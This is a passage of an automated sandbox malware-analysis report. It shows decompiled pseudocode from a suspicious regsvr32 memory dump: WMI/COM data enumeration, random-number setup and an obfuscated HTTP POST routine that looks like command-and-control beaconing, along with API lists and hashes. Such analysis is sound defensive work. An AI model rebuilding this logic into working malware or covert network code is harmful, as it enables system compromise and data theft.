                                                                                                                                                                        						__imp__#6(_v52);
                                                                                                                                                                        						goto L53;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                        					__eflags = _t262;
                                                                                                                                                                        					if(_t262 == 0) {
                                                                                                                                                                        						L49:
                                                                                                                                                                        						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                        						__eflags = _t252;
                                                                                                                                                                        						if(_t252 == 0) {
                                                                                                                                                                        							E05368BF4( &_v36, 0);
                                                                                                                                                                        							_t320 = _v36;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *(_t320 + 8) = _t252;
                                                                                                                                                                        							 *_t320 = E053698BD(_v100);
                                                                                                                                                                        							 *((intOrPtr*)(_t320 + 4)) = E053698BD(_v56);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L52;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                        						__eflags = _t186;
                                                                                                                                                                        						if(_t186 != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                        						_v48 = 0;
                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                        						__eflags = _v84;
                                                                                                                                                                        						if(_v84 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t187 = _v28;
                                                                                                                                                                        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                        						__eflags = _t188;
                                                                                                                                                                        						if(_t188 >= 0) {
                                                                                                                                                                        							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                        							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                        							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                        							_t253 = _t46;
                                                                                                                                                                        							_t327 = _t252 << 3;
                                                                                                                                                                        							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                        							_t192 = E05368C72(_t327, _t47);
                                                                                                                                                                        							__eflags = _t192;
                                                                                                                                                                        							if(_t192 == 0) {
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t193 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                        								L46:
                                                                                                                                                                        								_t252 = _v20;
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E05368BDE( *(_t327 +  *_t253) << 3);
                                                                                                                                                                        							_t200 =  *_t253;
                                                                                                                                                                        							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                        							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                        								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                        								E05368BF4(_t136, 0);
                                                                                                                                                                        								E05368BF4( &_v36, 0);
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t205 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                        								_t320 = _v36;
                                                                                                                                                                        								goto L46;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t207 = _v16;
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_v12 = _t207;
                                                                                                                                                                        								__eflags = _t207 - _v48;
                                                                                                                                                                        								if(_t207 > _v48) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44 = _v44 & 0x00000000;
                                                                                                                                                                        								_t209 =  &_v12;
                                                                                                                                                                        								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                        								__eflags = _t209;
                                                                                                                                                                        								if(_t209 < 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t212 = E053698BD(_v44);
                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                        								_t213 = _v28;
                                                                                                                                                                        								_t281 =  *_t213;
                                                                                                                                                                        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                        								__eflags = _t214;
                                                                                                                                                                        								if(_t214 < 0) {
                                                                                                                                                                        									L39:
                                                                                                                                                                        									__imp__#6(_v44);
                                                                                                                                                                        									_t207 = _v12 + 1;
                                                                                                                                                                        									__eflags = _t207;
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v92 = E05369DF2(_t281, 0xb28);
                                                                                                                                                                        								 *_t329 = 0x83f;
                                                                                                                                                                        								_t217 = E05369DF2(_t281);
                                                                                                                                                                        								_t283 = _v80;
                                                                                                                                                                        								_v96 = _t217;
                                                                                                                                                                        								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                        								__eflags = _t218 - 0xb;
                                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                                        									_t219 = _t218 - 0x10;
                                                                                                                                                                        									__eflags = _t219;
                                                                                                                                                                        									if(_t219 == 0) {
                                                                                                                                                                        										L35:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05368BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											L38:
                                                                                                                                                                        											E05368BAF( &_v92);
                                                                                                                                                                        											E05368BAF( &_v96);
                                                                                                                                                                        											__imp__#9( &_v80);
                                                                                                                                                                        											goto L39;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%d");
                                                                                                                                                                        										L37:
                                                                                                                                                                        										_push(0xc);
                                                                                                                                                                        										_push(_t289);
                                                                                                                                                                        										E05369E51();
                                                                                                                                                                        										_t329 = _t329 + 0x10;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t230 = _t219 - 1;
                                                                                                                                                                        									__eflags = _t230;
                                                                                                                                                                        									if(_t230 == 0) {
                                                                                                                                                                        										L33:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05368BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											goto L38;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%u");
                                                                                                                                                                        										goto L37;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t235 = _t230 - 1;
                                                                                                                                                                        									__eflags = _t235;
                                                                                                                                                                        									if(_t235 == 0) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t235 == 1;
                                                                                                                                                                        									if(_t235 == 1) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									L28:
                                                                                                                                                                        									__eflags = _t283 & 0x00002000;
                                                                                                                                                                        									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                        										_v88 = E05369DF2(_t283, 0xe0a);
                                                                                                                                                                        										E05369E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                        										E05368BAF( &_v88);
                                                                                                                                                                        										_t329 = _t329 + 0x18;
                                                                                                                                                                        										_t298 =  &_v616;
                                                                                                                                                                        										L31:
                                                                                                                                                                        										_t242 = E053698BD(_t298);
                                                                                                                                                                        										L32:
                                                                                                                                                                        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t242 = E0536E92E( &_v80);
                                                                                                                                                                        									goto L32;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                        									__eflags = _v72 - 0xffff;
                                                                                                                                                                        									_t298 = L"TRUE";
                                                                                                                                                                        									if(_v72 != 0xffff) {
                                                                                                                                                                        										_t298 = L"FALSE";
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L31;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t243 = _t218 - 1;
                                                                                                                                                                        								__eflags = _t243;
                                                                                                                                                                        								if(_t243 == 0) {
                                                                                                                                                                        									goto L38;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t244 = _t243 - 1;
                                                                                                                                                                        								__eflags = _t244;
                                                                                                                                                                        								if(_t244 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t245 = _t244 - 1;
                                                                                                                                                                        								__eflags = _t245;
                                                                                                                                                                        								if(_t245 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t245 != 5;
                                                                                                                                                                        								if(_t245 != 5) {
                                                                                                                                                                        									goto L28;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t298 = _v72;
                                                                                                                                                                        								goto L31;
                                                                                                                                                                        							}
                                                                                                                                                                        							__imp__#16(_v24);
                                                                                                                                                                        							_t210 = _v28;
                                                                                                                                                                        							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                        							_t252 = _v20;
                                                                                                                                                                        							L42:
                                                                                                                                                                        							_t262 = _v32;
                                                                                                                                                                        							_t252 = _t252 + 1;
                                                                                                                                                                        							_v20 = _t252;
                                                                                                                                                                        							__eflags = _t262;
                                                                                                                                                                        							if(_t262 != 0) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							L48:
                                                                                                                                                                        							_t324 = _v40;
                                                                                                                                                                        							goto L49;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t247 = _v28;
                                                                                                                                                                        						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					goto L48;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E05368BF4( &_v36, _t322);
                                                                                                                                                                        					_t320 = _v36;
                                                                                                                                                                        					goto L53;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x0536ee4f
                                                                                                                                                                        0x0536ee52
                                                                                                                                                                        0x0536ee52
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee52
                                                                                                                                                                        0x0536ebe2
                                                                                                                                                                        0x0536ebf6
                                                                                                                                                                        0x0536ebfa
                                                                                                                                                                        0x0536ebfc
                                                                                                                                                                        0x0536ec01
                                                                                                                                                                        0x0536ee10
                                                                                                                                                                        0x0536ee16
                                                                                                                                                                        0x0536ee21
                                                                                                                                                                        0x0536ee2c
                                                                                                                                                                        0x0536ee32
                                                                                                                                                                        0x0536ee38
                                                                                                                                                                        0x0536ee3b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee3b
                                                                                                                                                                        0x0536ec07
                                                                                                                                                                        0x0536edde
                                                                                                                                                                        0x0536edde
                                                                                                                                                                        0x0536ede1
                                                                                                                                                                        0x0536ede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec0f
                                                                                                                                                                        0x0536ec17
                                                                                                                                                                        0x0536ec1e
                                                                                                                                                                        0x0536ec24
                                                                                                                                                                        0x0536ec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec2f
                                                                                                                                                                        0x0536ec44
                                                                                                                                                                        0x0536ec4a
                                                                                                                                                                        0x0536ec53
                                                                                                                                                                        0x0536ec56
                                                                                                                                                                        0x0536ec59
                                                                                                                                                                        0x0536ec5b
                                                                                                                                                                        0x0536edd1
                                                                                                                                                                        0x0536edd4
                                                                                                                                                                        0x0536eddd
                                                                                                                                                                        0x0536eddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eddd
                                                                                                                                                                        0x0536ec6b
                                                                                                                                                                        0x0536ec6e
                                                                                                                                                                        0x0536ec75
                                                                                                                                                                        0x0536ec7b
                                                                                                                                                                        0x0536ec7e
                                                                                                                                                                        0x0536ec81
                                                                                                                                                                        0x0536ec84
                                                                                                                                                                        0x0536ec87
                                                                                                                                                                        0x0536ecc3
                                                                                                                                                                        0x0536ecc3
                                                                                                                                                                        0x0536ecc6
                                                                                                                                                                        0x0536ed72
                                                                                                                                                                        0x0536ed86
                                                                                                                                                                        0x0536ed96
                                                                                                                                                                        0x0536ed9a
                                                                                                                                                                        0x0536ed9c
                                                                                                                                                                        0x0536edb3
                                                                                                                                                                        0x0536edb7
                                                                                                                                                                        0x0536edc0
                                                                                                                                                                        0x0536edcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536edcb
                                                                                                                                                                        0x0536eda2
                                                                                                                                                                        0x0536eda3
                                                                                                                                                                        0x0536eda8
                                                                                                                                                                        0x0536eda8
                                                                                                                                                                        0x0536edaa
                                                                                                                                                                        0x0536edab
                                                                                                                                                                        0x0536edb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536edb0
                                                                                                                                                                        0x0536eccc
                                                                                                                                                                        0x0536eccc
                                                                                                                                                                        0x0536eccf
                                                                                                                                                                        0x0536ed3a
                                                                                                                                                                        0x0536ed4e
                                                                                                                                                                        0x0536ed5e
                                                                                                                                                                        0x0536ed62
                                                                                                                                                                        0x0536ed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ed6a
                                                                                                                                                                        0x0536ed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ed6b
                                                                                                                                                                        0x0536ecd1
                                                                                                                                                                        0x0536ecd1
                                                                                                                                                                        0x0536ecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecd6
                                                                                                                                                                        0x0536ecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecdb
                                                                                                                                                                        0x0536ecdb
                                                                                                                                                                        0x0536ece1
                                                                                                                                                                        0x0536ecfd
                                                                                                                                                                        0x0536ed0c
                                                                                                                                                                        0x0536ed15
                                                                                                                                                                        0x0536ed1a
                                                                                                                                                                        0x0536ed1d
                                                                                                                                                                        0x0536ed23
                                                                                                                                                                        0x0536ed23
                                                                                                                                                                        0x0536ed28
                                                                                                                                                                        0x0536ed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ed34
                                                                                                                                                                        0x0536ece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ece6
                                                                                                                                                                        0x0536ec89
                                                                                                                                                                        0x0536ecb0
                                                                                                                                                                        0x0536ecb5
                                                                                                                                                                        0x0536ecba
                                                                                                                                                                        0x0536ecbc
                                                                                                                                                                        0x0536ecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecba
                                                                                                                                                                        0x0536ec8b
                                                                                                                                                                        0x0536ec8b
                                                                                                                                                                        0x0536ec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec94
                                                                                                                                                                        0x0536ec94
                                                                                                                                                                        0x0536ec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec9d
                                                                                                                                                                        0x0536ec9d
                                                                                                                                                                        0x0536eca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eca6
                                                                                                                                                                        0x0536eca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecab
                                                                                                                                                                        0x0536eded
                                                                                                                                                                        0x0536edf3
                                                                                                                                                                        0x0536edf9
                                                                                                                                                                        0x0536edfc
                                                                                                                                                                        0x0536edff
                                                                                                                                                                        0x0536edff
                                                                                                                                                                        0x0536ee02
                                                                                                                                                                        0x0536ee03

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0536E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E413
                                                                                                                                                                          • Part of subcall function 0536E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E424
                                                                                                                                                                          • Part of subcall function 0536E400: CoCreateInstance.OLE32(0537C868,00000000,00000001,0537C878,?,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E43B
                                                                                                                                                                          • Part of subcall function 0536E400: SysAllocString.OLEAUT32(00000000), ref: 0536E446
                                                                                                                                                                          • Part of subcall function 0536E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E471
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536EAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536EB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536EE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536EE99
                                                                                                                                                                          • Part of subcall function 05368BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05368C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: 6870f1cf3d3b16bb8cbc469c4e0a3598d42a37c4c2531ae6bca5d6227c1a6e52
                                                                                                                                                                        • Instruction ID: 6dc63434ad1504b020f24f78e94b61715337611c4db8c62d418face0c5731616
                                                                                                                                                                        • Opcode Fuzzy Hash: 6870f1cf3d3b16bb8cbc469c4e0a3598d42a37c4c2531ae6bca5d6227c1a6e52
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE15F76E00219AFDB14DFE4C898EEEBBB9FF48300F10855DE516A7248DB71A905CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E053728F0(intOrPtr* _a4) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				_Unknown_base(*)()* _t15;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                        				struct HINSTANCE__* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                        				_v12 = _t15;
                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0xf0000000);
                                                                                                                                                                        				_push(1);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				if( *_t25() == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                        				 *_t29(_v8, 0);
                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *_a4 = E0537284B( &_v16);
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,05367B6A), ref: 05372902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0537291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 05372928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 05372937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: f30d0ab52fd3f301217ed33942f3d181b782a035ab2e61a0b0429a85e3286824
                                                                                                                                                                        • Instruction ID: 0d567c8c53e8135800fea3bc0bc06cf5cd6143e55ccb705d62dd5fb80e3a03fb
                                                                                                                                                                        • Opcode Fuzzy Hash: f30d0ab52fd3f301217ed33942f3d181b782a035ab2e61a0b0429a85e3286824
                                                                                                                                                                        • Instruction Fuzzy Hash: 07118237E5030EB7DB31A6A48C45F9FB7ECAF45650F190160FA01F6150EBB8DA01A6A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E0536F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				int _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				int _v96;
                                                                                                                                                                        				void* _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				char* _v112;
                                                                                                                                                                        				char _v116;
                                                                                                                                                                        				char _v132;
                                                                                                                                                                        				void _v388;
                                                                                                                                                                        				void _v644;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				intOrPtr* _t105;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                        				char _t117;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				char _t122;
                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				intOrPtr _t139;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t145;
                                                                                                                                                                        				intOrPtr _t147;
                                                                                                                                                                        				intOrPtr _t153;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t159;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t165;
                                                                                                                                                                        				intOrPtr _t179;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				char _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				char _t193;
                                                                                                                                                                        				signed int _t194;
                                                                                                                                                                        				signed int _t195;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = 4;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v28 = 1;
                                                                                                                                                                        				_t190 = __edx;
                                                                                                                                                                        				memset( &_v388, 0, 0x100);
                                                                                                                                                                        				memset( &_v644, 0, 0x100);
                                                                                                                                                                        				_v56 = E05369DD8(0xd62);
                                                                                                                                                                        				_v52 = E05369DD8(0x8e9);
                                                                                                                                                                        				_v48 = E05369DD8(0xa93);
                                                                                                                                                                        				_v44 = E05369DD8(0x9a9);
                                                                                                                                                                        				_t94 = E05369DD8(0xb64);
                                                                                                                                                                        				_v36 = _v36 & 0;
                                                                                                                                                                        				_t188 = 0x3c;
                                                                                                                                                                        				_v40 = _t94;
                                                                                                                                                                        				E05368D6D( &_v116, 0, 0x100);
                                                                                                                                                                        				_v108 = 0x10;
                                                                                                                                                                        				_v112 =  &_v132;
                                                                                                                                                                        				_v116 = _t188;
                                                                                                                                                                        				_v100 =  &_v388;
                                                                                                                                                                        				_v96 = 0x100;
                                                                                                                                                                        				_v72 =  &_v644;
                                                                                                                                                                        				_push( &_v116);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_v68 = 0x100;
                                                                                                                                                                        				_push(E0536A43D(_t190));
                                                                                                                                                                        				_t102 =  *0x537f838; // 0x0
                                                                                                                                                                        				_push(_t190);
                                                                                                                                                                        				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                        					_t104 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t105 =  *0x537f838; // 0x0
                                                                                                                                                                        						_v8 = 0x8404f700;
                                                                                                                                                                        						_t189 =  *_t105( *0x537f920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                        						__eflags = _t189;
                                                                                                                                                                        						if(_t189 != 0) {
                                                                                                                                                                        							E0536F73E(_t189);
                                                                                                                                                                        							_t110 =  *0x537f838; // 0x0
                                                                                                                                                                        							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                                                                                        							__eflags = _a24;
                                                                                                                                                                        							_t165 = _t111;
                                                                                                                                                                        							if(_a24 != 0) {
                                                                                                                                                                        								E0536A065(_a24);
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t165;
                                                                                                                                                                        							if(_t165 != 0) {
                                                                                                                                                                        								__eflags = _v104 - 4;
                                                                                                                                                                        								_t112 = 0x8484f700;
                                                                                                                                                                        								if(_v104 != 4) {
                                                                                                                                                                        									_t112 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t115 =  *0x537f838; // 0x0
                                                                                                                                                                        								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                        								_v8 = _t116;
                                                                                                                                                                        								__eflags = _a24;
                                                                                                                                                                        								if(_a24 != 0) {
                                                                                                                                                                        									E0536A065(_a24);
                                                                                                                                                                        									_t116 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t116;
                                                                                                                                                                        								if(_t116 != 0) {
                                                                                                                                                                        									__eflags = _v104 - 4;
                                                                                                                                                                        									if(_v104 == 4) {
                                                                                                                                                                        										E0536F6EC(_t116);
                                                                                                                                                                        									}
                                                                                                                                                                        									_t117 = E05369DD8(0x901);
                                                                                                                                                                        									_t193 = _t117;
                                                                                                                                                                        									_v16 = _t193;
                                                                                                                                                                        									_t119 =  *0x537f838; // 0x0
                                                                                                                                                                        									_t194 = _v8;
